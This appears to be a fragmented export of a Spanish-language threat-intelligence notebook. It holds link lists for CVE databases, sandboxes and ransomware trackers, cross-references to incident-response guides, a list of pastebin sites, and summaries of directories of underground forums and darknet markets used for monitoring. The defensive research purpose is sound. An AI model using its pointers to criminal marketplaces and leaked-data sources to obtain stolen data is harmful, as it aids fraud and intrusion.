Snyk Atlassian CVE | https://security.snyk.io/vuln/?search=atlassian
CVE Mitre | https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=
Seebug | https://www.seebug.org/
Ransomwatch | https://ransomwatch.telemetry.ltd/#/recentposts
BushidoUK Ransomware Gist | https://gist.github.com/BushidoUK/d6e4ee6fc627f1b4a5fc3e5b6aa5fd36
DRM Report Q1 2023 | https://ransom.insicurezzadigitale.com/data/reports/2023/DRM-Report-Q1-2023-[ENG].pdf
CyberNews Ransomlooker | https://cybernews.com/ransomlooker/
VirusTotal | https://www.virustotal.com/gui/home/upload
Tria.ge | https://tria.ge/
Any.run | https://app.any.run/
Malpedia | https://malpedia.caad.fkie.fraunhofer.de/
AttackerKB | https://attackerkb.com/about
JoeSandbox | https://www.joesandbox.com/#windows
Collidu Presentation | https://www.collidu.com/presentation-attack-surface
Creately Diagram | https://creately.com/diagram/example/irgbndqs1/attack-surface-classic
Dribbble Attack Surface | https://dribbble.com/tags/attack-surface
GitHub Attack Surface Topics | https://github.com/topics/attack-surface
OWASP Cheat Sheet | https://cheatsheetseries.owasp.org/cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html
SketchBubble Presentation | https://www.sketchbubble.com/en/presentation-attack-surface.html
BishopFox SmogCloud | https://github.com/BishopFox/smogcloud
RossGeerlings Webstor | https://github.com/RossGeerlings/webstor
Superhedgy AttackSurfaceMapper | https://github.com/superhedgy/AttackSurfaceMapper
0xtavian Attack Surface Monitoring | https://github.com/0xtavian/awesome-attack-surface-monitoring
3nock OTE | https://github.com/3nock/OTE
Dreizehnutters Vide | https://github.com/dreizehnutters/vide
ProjectDiscovery Uncover | https://github.com/projectdiscovery/uncover
Cybersecurity Subreddit | https://www.reddit.com/r/cybersecurity/
PurpleTeamSec Subreddit | https://www.reddit.com/r/purpleteamsec/
ThreatIntel Subreddit | https://www.reddit.com/r/threatintel/
tema-curso-ics-pentesting ]]>projects/cti/cti-basics-for-beginners.htmlProjects/cti/cti-basics-for-beginners.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-templates-comparativa ]]>projects/cti/entidad-bushidouk-rfi-template.htmlProjects/cti/entidad-bushidouk-rfi-template.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina ]]>projects/cti/campaign-solarwinds-2020.htmlProjects/cti/campaign-solarwinds-2020.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-02-windows-intrusion — Deteccion de intrusiones Windows, referenciado para mas detalles de identificacion
certsg-irm-03-unix-linux-intrusion — Deteccion de intrusiones Unix/Linux, referenciado para mas detalles de identificacion
certsg-irm-07-windows-malware — Deteccion de malware en Windows, complementario
certsg-irm-17-ransomware — Respuesta a ransomware, caso especifico de malware
certsg-irm-18-large-scale-compromise — Compromiso a gran escala, referenciado para recuperacion de infraestructura Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-01-worm-infection.htmlProjects/cti/certsg-irm-01-worm-infection.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-01-worm-infection — Respuesta a infecciones por malware, referencia cruzada desde identificacion
certsg-irm-03-unix-linux-intrusion — Equivalente para sistemas Unix/Linux
certsg-irm-07-windows-malware — Deteccion de malware Windows, complementario
certsg-irm-18-large-scale-compromise — Referenciado para crisis estrategicas y recuperacion de infraestructura Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-02-windows-intrusion.htmlProjects/cti/certsg-irm-02-windows-intrusion.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-02-windows-intrusion — Equivalente para sistemas Windows
certsg-irm-01-worm-infection — Respuesta a infecciones por malware, referencia cruzada
certsg-irm-05-malicious-network-behaviour — Comportamiento de red malicioso, complementario
certsg-irm-18-large-scale-compromise — Referenciado para recuperacion de infraestructura Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-03-unix-linux-intrusion.htmlProjects/cti/certsg-irm-03-unix-linux-intrusion.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-05-malicious-network-behaviour — Comportamiento de red malicioso, complementario para analisis de trafico
certsg-irm-08-blackmail — Extorsion/chantaje, relevante cuando DDoS es acompanado de demanda de rescate
certsg-irm-18-large-scale-compromise — Referenciado para recuperacion de infraestructura Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-04-ddos.htmlProjects/cti/certsg-irm-04-ddos.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-02-windows-intrusion — Referenciado para remediacion de intrusiones Windows
certsg-irm-03-unix-linux-intrusion — Referenciado para remediacion de intrusiones Linux
certsg-irm-04-ddos — DDoS, caso especifico de comportamiento de red malicioso
certsg-irm-12-insider-abuse — Abuso interno, relevante cuando la fuente es un insider
certsg-irm-18-large-scale-compromise — Referenciado para recuperacion de infraestructura Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-05-malicious-network-behaviour.htmlProjects/cti/certsg-irm-05-malicious-network-behaviour.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-02-windows-intrusion — Deteccion de intrusiones Windows, si el servidor web es Windows
certsg-irm-03-unix-linux-intrusion — Deteccion de intrusiones Linux, si el servidor web es Linux
certsg-irm-13-customer-phishing — Phishing a clientes, puede usar sitios web comprometidos
certsg-irm-18-large-scale-compromise — Referenciado para recuperacion de infraestructura Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-06-website-defacement.htmlProjects/cti/certsg-irm-06-website-defacement.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-02-windows-intrusion — Deteccion de intrusiones Windows, complementario y referenciado
certsg-irm-01-worm-infection — Infeccion por worm, referenciado para propagacion
certsg-irm-17-ransomware — Ransomware, derivacion si se identifica esa familia
certsg-irm-18-large-scale-compromise — Compromiso a gran escala, referenciado para crisis estrategicas Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm
tema-malware-cadena-completa ]]>projects/cti/certsg-irm-07-windows-malware.htmlProjects/cti/certsg-irm-07-windows-malware.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-04-ddos — DDoS, amenaza comun asociada a extorsion
certsg-irm-11-information-leakage — Filtracion de informacion, amenaza asociada al chantaje
certsg-irm-17-ransomware — Ransomware, forma especifica de chantaje digital Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-08-blackmail.htmlProjects/cti/certsg-irm-08-blackmail.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-07-windows-malware — Deteccion de malware en Windows, equivalente para desktop
certsg-irm-01-worm-infection — Infeccion por malware, smartphones como vectores de propagacion
certsg-irm-16-phishing — Phishing, vector comun de infeccion en moviles Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm
tema-malware-cadena-completa ]]>projects/cti/certsg-irm-09-smartphone-malware.htmlProjects/cti/certsg-irm-09-smartphone-malware.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-16-phishing — Phishing interno, forma especifica de ingenieria social por email
certsg-irm-13-customer-phishing — Phishing a clientes, variante orientada al exterior
certsg-irm-08-blackmail — Chantaje, puede involucrar tacticas de ingenieria social Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-10-social-engineering.htmlProjects/cti/certsg-irm-10-social-engineering.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-12-insider-abuse — Abuso interno, caso donde la filtracion es intencional por un empleado
certsg-irm-07-windows-malware — Malware Windows, referenciado cuando la causa es malware
certsg-irm-17-ransomware — Ransomware, referenciado cuando la filtracion viene de shaming lists
certsg-irm-08-blackmail — Chantaje, la filtracion puede derivar en extorsion Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-11-information-leakage.htmlProjects/cti/certsg-irm-11-information-leakage.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-11-information-leakage — Filtracion de informacion, caso asociado frecuentemente
certsg-irm-02-windows-intrusion — Referenciado para investigacion forense en Windows
certsg-irm-03-unix-linux-intrusion — Referenciado para investigacion forense en Linux
certsg-irm-05-malicious-network-behaviour — Comportamiento de red malicioso, vector de deteccion Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-12-insider-abuse.htmlProjects/cti/certsg-irm-12-insider-abuse.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-16-phishing — Phishing interno a colaboradores, complemento directo
certsg-irm-14-scam — Estafas fraudulentas, comparte procedimientos de takedown
certsg-irm-15-trademark-infringement — Infraccion de marca, cybersquatting asociado
certsg-irm-18-large-scale-compromise — Compromiso a gran escala, referenciado para recuperacion Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm
tema-phishing-completo ]]>projects/cti/certsg-irm-13-customer-phishing.htmlProjects/cti/certsg-irm-13-customer-phishing.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-13-customer-phishing — Phishing a clientes, procedimientos de takedown compartidos
certsg-irm-15-trademark-infringement — Infraccion de marca, cybersquatting asociado a scams
certsg-irm-08-blackmail — Chantaje, puede involucrar tacticas de scam
certsg-irm-18-large-scale-compromise — Compromiso a gran escala, referenciado para recuperacion Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-14-scam.htmlProjects/cti/certsg-irm-14-scam.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-13-customer-phishing — Phishing a clientes, referenciado para casos con componente de phishing
certsg-irm-14-scam — Scam, referenciado para casos con componente de estafa
certsg-irm-06-website-defacement — Defacement, puede involucrar abuso de marca Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-15-trademark-infringement.htmlProjects/cti/certsg-irm-15-trademark-infringement.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-13-customer-phishing — Phishing a clientes, complemento orientado al exterior
certsg-irm-07-windows-malware — Malware Windows, referenciado cuando la campana distribuye malware
certsg-irm-10-social-engineering — Ingenieria social, phishing como forma especifica
certsg-irm-18-large-scale-compromise — Compromiso a gran escala, referenciado para recuperacion Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm
tema-phishing-completo ]]>projects/cti/certsg-irm-16-phishing.htmlProjects/cti/certsg-irm-16-phishing.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-18-large-scale-compromise — Compromiso a gran escala, referencia principal para procedimientos detallados
certsg-irm-07-windows-malware — Malware Windows, deteccion y analisis de binarios
certsg-irm-08-blackmail — Chantaje, ransomware como forma de extorsion
certsg-irm-11-information-leakage — Filtracion de informacion, data leak asociado a ransomware moderno Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm
tema-ransomware-actores-y-respuesta ]]>projects/cti/certsg-irm-17-ransomware.htmlProjects/cti/certsg-irm-17-ransomware.mdTue, 28 Apr 2026 14:29:12 GMTcertsg-irm-17-ransomware — Ransomware, caso especifico frecuente de compromiso a gran escala
certsg-irm-02-windows-intrusion — Intrusion Windows, pasos de remediacion referenciados
certsg-irm-03-unix-linux-intrusion — Intrusion Linux, pasos de remediacion referenciados
certsg-irm-01-worm-infection — Infeccion por gusano, tecnicas de contencion compartidas
certsg-irm-05-malicious-network-behaviour — Comportamiento de red malicioso, deteccion de C2 Tema principal: Themes/respuesta-incidentes-lifecycle
tema-incident-response-irm ]]>projects/cti/certsg-irm-18-large-scale-compromise.htmlProjects/cti/certsg-irm-18-large-scale-compromise.mdTue, 28 Apr 2026 14:29:12 GMThttps://www.curatedintel.org/) Tipo: comunidad de threat intel analysts (UK-based) Producto: ademas del template, publican research notes y un mapa de actores
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-templates-comparativa ]]>projects/cti/entidad-curated-intelligence-threat-actor-profile.htmlProjects/cti/entidad-curated-intelligence-threat-actor-profile.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-kill-chains-comparativa ]]>projects/cti/entidad-diamond-model.htmlProjects/cti/entidad-diamond-model.mdTue, 28 Apr 2026 14:29:12 GMThttps://www.first.org/ Estandares: TLP, CVSS, EPSS, CSIRT Services Framework, SIG groups (especializados) Conferencia anual: FIRST Annual Conference (Junio)
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina ]]>projects/cti/entidad-first-org.htmlProjects/cti/entidad-first-org.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-templates-comparativa ]]>projects/cti/entidad-idir-templates.htmlProjects/cti/entidad-idir-templates.mdTue, 28 Apr 2026 14:29:12 GMThttps://kravensecurity.com/) Tipo: blog + consultora UK Estilo: didactico, orientado a junior analysts
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-templates-comparativa ]]>projects/cti/entidad-kraven-security-cti-template.htmlProjects/cti/entidad-kraven-security-cti-template.mdTue, 28 Apr 2026 14:29:12 GMThttps://zeltser.com/)
URL template: https://zeltser.com/cyber-threat-intel-report-template/ Filosofia: BLUF + brevity + actionable Largo tipico: 1-3 paginas
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-templates-comparativa ]]>projects/cti/entidad-zeltser-cti-template.htmlProjects/cti/entidad-zeltser-cti-template.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-kill-chains-comparativa ]]>projects/cti/entidad-cyber-kill-chain.htmlProjects/cti/entidad-cyber-kill-chain.mdTue, 28 Apr 2026 14:29:12 GMThttps://www.misp-project.org/
GitHub: https://github.com/MISP/MISP Comunidades famosas: CIRCL, FIRST, NCSC sectorial communities Formato propio: MISP JSON, exporta a STIX 1.x/2.x, OpenIOC, CSV, suricata, snort, yara
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-tips-sirp-stack-open-source ]]>projects/cti/entidad-misp.htmlProjects/cti/entidad-misp.mdTue, 28 Apr 2026 14:29:12 GMThttps://attack.mitre.org/ Matrices: Enterprise (Windows/Linux/macOS/Cloud/Network/Containers), Mobile, ICS 14 tacticas Enterprise: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, C2, Exfiltration, Impact, Recon, Resource Development Update cycle: dos releases mayores al ano (abril, octubre)
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-mitre-attack-ecosistema ]]>projects/cti/entidad-mitre-attack.htmlProjects/cti/entidad-mitre-attack.mdTue, 28 Apr 2026 14:29:12 GMThttps://mitre-attack.github.io/attack-navigator/
Open source: https://github.com/mitre-attack/attack-navigator Formato: JSON con extension .navlayer Funciones clave: scoring, comments, color coding, layer combination, search/multiselect
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-mitre-attack-ecosistema ]]>projects/cti/entidad-mitre-attack-navigator.htmlProjects/cti/entidad-mitre-attack-navigator.mdTue, 28 Apr 2026 14:29:12 GMThttps://www.mitre.org/
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-mitre-attack-ecosistema ]]>projects/cti/entidad-mitre-corporation.htmlProjects/cti/entidad-mitre-corporation.mdTue, 28 Apr 2026 14:29:12 GMThttps://github.com/center-for-threat-informed-defense/cti-blueprints Mantenedor: MITRE Center for Threat-Informed Defense Productos cubiertos: Campaign Report, Threat Actor Profile, Intel Brief, Quick Read, Hunt Hypothesis, Detection Engineering Spec Licencia: Apache 2.0 (libre uso comercial)
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-mitre-attack-ecosistema
tema-templates-comparativa ]]>projects/cti/entidad-mitre-cti-blueprints.htmlProjects/cti/entidad-mitre-cti-blueprints.mdTue, 28 Apr 2026 14:29:12 GMThttps://filigran.io/) Lanzado: 2019
URL: https://www.opencti.io/
GitHub: https://github.com/OpenCTI-Platform/opencti Stack: GraphQL + Elasticsearch + Redis + RabbitMQ Diferenciador: native STIX 2.1, knowledge graph navigation
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-tips-sirp-stack-open-source ]]>projects/cti/entidad-opencti.htmlProjects/cti/entidad-opencti.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Concepto unico = nota propia. Find information that has been uploaded to Pastebin & alternative pastebin-type sites
BeanPaste - A tiny way to share text.
bpaste - Welcome to bpaste, this site is a pastebin. It allows you to share code with others.
CentOS Pastebin Service - Stikked is an Open-Source PHP Pastebin, with the aim of keeping a simple and easy to use user interface.
cl1p - The Internet Clipboard.
commie - commie is a pastebin script with line commenting support.
Context - Share whatever you see with others in seconds.
ControlC Pastebin - The easiest way to host your text.
Cryptobin - The Ultimate Secure Pastebin
Cutapaste - Short Code and Share.
Defuse - Encrypted Pastebin - Keep your data private and secure!
doxbin - A dox style pastebin ran by hackers.
dpaste2
dpaste
Etusivu - It's an open source clone of pastebin.com. Default Language is Finnish.
Friendpaste - Paste stuff to your friends.
GitHub gist
HashBin - HashBin is a paste bin that never sees the contents of its pastes.
hastebin
ideone
ivpaste
jsbin
justpaste
Katbin - Small, lightweight pastebin.
Linkode(alpha) - Linkode is the useful pastebin!
Logpasta - Simple, secure log paste service. Command line mode based.
lesma.eu - Simple paste app friendly with browser and command line.
Nachricht - With Nachricht.co you can send self-destructive and encrypted one-way messages over the Internet. You don't even need to miss out the messenger or social network of your choice. We are an independent, secure and fully free service!
NoPaste - NoPaste is an open-source website similar to Pastebin where you can store any piece of code, and generate links for easy sharing.
nopaste.net - nopaste.net is a temporary file host, nopaste and clipboard across machines. You can upload files or text and share the link with others.
Notes - fast.easy.short.
nekobin - Paste code, save and share the link!
New Paste - I wanna paste because typing is so boring!
n0paste - Paste and share your code online.
OTS- One Time Secrets - An encrypted pastebin site. No login needed!
paaster - Paaster is a secure and user-friendly pastebin application that prioritizes privacy and simplicity. With end-to-end encryption and paste history, Paaster ensures that your pasted code remains confidential and accessible.
PastBin.net - Similar to Pastebin website where you can store code/text online for a set period of time and share to anyone anywhere. Search Option Available.
Pastebin - Store code/text online for a set period of time and share to anybody on earth.
Pastebin.cz - A simple Pastebin.
Paste.Cash - Paste.CASH Is a privacy respected and encrypted pastebin hosted by Cash Hosting. Every paste are encrypted using 256 bits AES.
paste.centos
paste.debian
paste.in.ua - Simple pastebin.
paste.kde
Paste.Monster - Share your thoughts online. API Available.
paste.ubuntu
Paste.Quest - Copy and Paste text online to share with anyone anywhere. Use the password option to add a password to the pasted information.
Pastery - The sweetest pastebin in the world!
PasteSite.Net - The new generation pastebin.
paste.sh - This is an encrypted paste site. Simply type or paste code here and share the URL. Saving is Automatic.
PasteShr - Store any text online for easy sharing. Search option available!
Pastebin - Tor Link - Paste text to store or share with others.
Rentry - Rentry.co is a markdown paste service service with preview, custom urls and editing. Fast, simple and free.
SafeNote - SafeNote is a free web-based service that allows you to share a note or a file with confidentiality. There is no way to spying on you even to a hacker.
scrt.link - Share a Secret with a link that only works one time and then self-destructs.
snippet.host - Minimal text and code snippet hosting.
Spacebin - Spacebin is a modern Pastebin server implemented in Go and is capable of serving notes, novels, code, or any other form of text.
TextBin - Secure pastebin where you can paste and store any type of text or code snippets online and share it with your friends.
Textbin-Code - SECURE YOUR CODE!
TutPaste - Welcome to our fast and free online paste tool. Paste and share your text or code snippets with anyone, anywhere, no registration required.
vaultbin - Vaultbin is a blazingly fast and secure alternative to Pastebin and Hastebin.
Verybin - Anonymous and encrypted pastebin. Data is encrypted/decrypted in the browser using 256 bits AES and no IP address logged.
Write.as - Type words, put them on the internet.
ZBin - Private & Secure Pastebin.
ZeroBin - ZeroBin is a minimalist, opensource online pastebin where the server has zero knowledge of pasted data. Data is encrypted/decrypted in the browser using 256 bits AES. Importado desde Inbox/Redes Pastes.md durante consolidacion bulk. Sitios de paste utilizados frecuentemente para compartir datos filtrados, credenciales comprometidas y comunicaciones de actores de amenazas. Incluye herramientas de busqueda especializada en contenido de pastes.Paste sites / Monitorizacion de filtraciones / Inteligencia de fuentes abiertas. Monitorizar paste sites en busca de datos filtrados de clientes Buscar credenciales comprometidas en pastes publicos Rastrear comunicaciones de actores de amenazas
Parte del flujo de monitorizacion de data-breach-search-engines PasteBin tiene API para monitorizacion automatizada Los datos en pastes suelen eliminarse rapidamente, preservar evidencia
Ver data-breach-search-engines para fuentes de datos filtrados
Ver data-breach-search-engines para bases de datos de credenciales comprometidas
tema-darkweb-osint ]]>projects/cti/pastebins.htmlProjects/cti/pastebins.mdTue, 28 Apr 2026 14:29:12 GMTcti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina ]]>projects/cti/threat-actor-sandworm.htmlProjects/cti/threat-actor-sandworm.mdTue, 28 Apr 2026 14:29:12 GMThttps://oasis-open.github.io/cti-documentation/
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-tips-sirp-stack-open-source ]]>projects/cti/entidad-stix-taxii.htmlProjects/cti/entidad-stix-taxii.mdTue, 28 Apr 2026 14:29:12 GMThttps://strangebee.com/thehive/
GitHub: https://github.com/TheHive-Project/TheHive Version actual: TheHive 5.x
cti-recursos-juniors-unificado — referenciada en la nota madre del vault. Relacionado con: [[]] Tema principal: Themes/
tema-cti-fundamentos-doctrina
tema-tips-sirp-stack-open-source ]]>projects/cti/entidad-thehive.htmlProjects/cti/entidad-thehive.mdTue, 28 Apr 2026 14:29:12 GMTosint-references-master. Concepto unico = nota propia. Search for Threat actors and their associated information.
APT Groups and Operations - Know about Threat Actors, sponsored countries, their tools, methods, etc.
APTWiki - Historical wiki with 214 actor entries.
Bi.Zone - 148 threat groups with detailed TTPs.
BreachHQ - Provides a list of all known cyber threat actors also referred to as malicious actors, APT groups or hackers.
Cybergeist - Cybergeist.io generates intelligence profiles about key threats and threat context that is actively being discussed and reported upon across the internet.
Dark Web Informer - Tracking 854 Threat Actors as of 29th of May 2025.
ETDA - Search for Threat Actor groups and their tools.
FortiGuard Labs - Powered by FortiGuard Labs, our Threat Actor Encyclopedia provides actionable insights, helping security teams prepare and streamline advanced threat hunting and response.
KNOWLEDGENOW - Trending Threats.
lazarusholic - Total 203 threat actors.
Malpedia - Get List of threat actor groups.
MISP Galaxy - Known or estimated adversary groups as identified by 360.net.
OPENHUNTING.IO - Threat Library Collecting Information.
SOCRadar LABS - Know threat actor tactics, techniques, and past activities. Access detailed profiles and track their activities.Keep up with the latest threats and Tactics, Techniques, and Procedures (TTPs).
Thales - Find Threat actor groups in a graphical attack explorer. Importado desde Inbox/Arsenal del Actor.md durante consolidacion bulk. Coleccion de recursos clave para investigar el arsenal (herramientas y malware) empleado por threat actors. Incluye bases de datos de software ofensivo (MITRE ATT&CK), fichas de grupos (ETDA), repositorios de muestras de malware (VX-Underground), e informes de CERTs y proveedores de inteligencia de amenazas.Herramientas y malware de actores de amenazas: bases de datos de software, muestras y reportes de CERTs. Identificar herramientas y malware asociados a un threat actor especifico Obtener muestras para analisis en sandbox o ingenieria inversa Mapear software ofensivo contra tecnicas MITRE ATT&CK Complementar perfilado de actores con informacion de arsenal Los recursos de VX-Underground requieren precaucion al descargar muestras Las fichas ETDA son utiles para correlacionar grupos con herramientas conocidas
Se recomienda cruzar con threat-actor-search y threat-actor-search para un perfil completo del adversario Importado desde Inbox/Black Forums.md durante consolidacion bulk. Directorio exhaustivo de aproximadamente 200 foros underground y darknet. Incluye foros de hacking, carding, leaks de datos, criptomonedas y comunidades underground en multiples idiomas (ruso, ingles, etc.). Se mantiene el estado online/offline actualizado.Foros underground / Darknet / Cibervigilancia / Threat Intelligence. Monitorizar foros underground en busca de datos filtrados de clientes Rastrear comunicaciones de actores de amenazas Identificar venta de accesos, credenciales o datos robados Investigar campanas de carding y fraude Cibervigilancia proactiva de amenazas emergentes XSS y Exploit.in son los foros premium de habla rusa BreachForums es el sucesor de RaidForums (seized by FBI) Dread es el "Reddit" de la darknet LOLZ.guru es uno de los foros mas activos del ecosistema ruso Los estados online/offline cambian frecuentemente, verificar periodicamente
Ver threat-actor-search para mercados underground
Ver opsec-network-transport-security para herramientas de monitorizacion
Ver data-breach-search-engines para fuentes de datos filtrados Importado desde Inbox/Black Markets.md durante consolidacion bulk. Directorio exhaustivo de aproximadamente 120 mercados underground y darknet. Incluye marketplaces de carding, venta de credenciales (RDP, logs, cookies), datos robados, malware-as-a-service, documentos falsos y drogas. Se mantiene el estado online/offline actualizado.Mercados underground / Darknet markets / Cibervigilancia / Threat Intelligence. Monitorizar mercados underground en busca de datos robados de clientes Rastrear venta de credenciales y accesos RDP comprometidos Investigar campanas de carding y fraude financiero Identificar servicios de malware-as-a-service Cibervigilancia proactiva de amenazas a la organizacion Russian Market es uno de los mercados mas grandes de credenciales y logs Genesis Market fue seized by FBI en 2023 (Operation Cookie Monster) BidenCash publica dumps masivos de tarjetas de credito periodicamente STYX es un mercado emergente de servicios de cibercrimen Los estados online/offline cambian frecuentemente, verificar periodicamente
Ver threat-actor-search para foros underground
Ver opsec-network-transport-security para herramientas de monitorizacion
Ver data-breach-search-engines para bases de datos de credenciales Importado desde Inbox/Informacion General.md durante consolidacion bulk. Directorio de las 7 plataformas de referencia para obtener informacion general sobre threat actors. Incluye bases de datos de campañas, fichas de grupos APT, playbooks de investigacion y mapas de amenazas globales.Plataformas de inteligencia de amenazas para perfilado general de threat actors. Identificar y perfilar un threat actor por nombre o alias Consultar campañas conocidas asociadas a un grupo Obtener playbooks de investigacion para grupos especificos Visualizar panorama global de amenazas activas MITRE ATT&CK es la referencia principal para mapeo de campañas y TTPs Malpedia destaca por su enfoque academico y catalogacion exhaustiva de malware
Forma parte de la estructura de threat-actor-search en el cheatsheet CTI-OSINT Importado desde Inbox/Informacion de Victimas.md durante consolidacion bulk. Directorio de plataformas especializadas en el seguimiento de victimas de ransomware. Permite monitorizar que organizaciones han sido comprometidas, por que grupos, y en que sectores/regiones.Seguimiento de victimas de ransomware: leak sites, feeds de actividad, monitorizacion. Monitorizar si clientes o sectores relevantes aparecen como victimas Identificar grupos de ransomware activos y sus patrones de targeting Alimentar reportes de inteligencia estrategica con datos de victimologia Evaluar nivel de amenaza ransomware para sectores especificos DarkTracer ofrece la cobertura mas amplia de leak sites (rating 3/3)
Se recomienda cruzar con threat-actor-search y threat-actor-search para contexto geografico
Forma parte de la estructura de threat-actor-search en el cheatsheet CTI-OSINT Importado desde Inbox/Informacion del Actor.md durante consolidacion bulk. Nota indice que organiza los recursos de investigacion de threat actors en tres categorias principales: informacion general (plataformas de inteligencia), proveedores de inteligencia (blogs y reportes de vendors) y CERTs/organismos publicos (fuentes gubernamentales).Indice de recursos de perfilado de threat actors. Punto de partida para investigacion de un threat actor desconocido Navegacion rapida a fuentes especializadas por tipo de informacion Referencia durante perfilado de adversarios para reportes CTI
Este indice es parte del segundo nivel del cti-osint-cheatsheet
Complementar con threat-actor-search para herramientas y threat-actor-search para TTPs
La categoria threat-actor-search contiene las 7 plataformas mas relevantes Importado desde Inbox/Modus Operandi.md durante consolidacion bulk. Nota indice del modulo "Modus Operandi" dentro del cheatsheet CTI-OSINT. Organiza los recursos para analizar como operan los threat actors en dos grandes bloques: tacticas, tecnicas y procedimientos (TTPs) y planes de mitigacion correspondientes.Analisis de modus operandi: TTPs y mitigaciones. Mapear TTPs de un threat actor a tecnicas MITRE ATT&CK Identificar planes de mitigacion aplicables a las tecnicas detectadas Estructura de analisis para reportes de perfilado de adversarios
Este indice forma parte del tercer nivel del cti-osint-cheatsheet Los TTPs y mitigaciones deben analizarse en conjunto para evaluar gaps de cobertura
Complementar con threat-actor-search para correlacionar herramientas con tecnicas Importado desde Inbox/Objetivos de Ataques.md durante consolidacion bulk. Nota indice del modulo "Objetivos de Ataques" dentro del cheatsheet CTI-OSINT. Organiza los recursos para analizar que, donde, a quien y en que sectores atacan los threat actors, en cuatro submodulos.Indice de targeting: operaciones, paises, victimas y sectores. Analizar el perfil de targeting completo de un threat actor Identificar si un cliente o sector especifico es objetivo activo Alimentar reportes de inteligencia estrategica con datos de victimologia Navegar de forma estructurada los recursos de targeting del cheatsheet
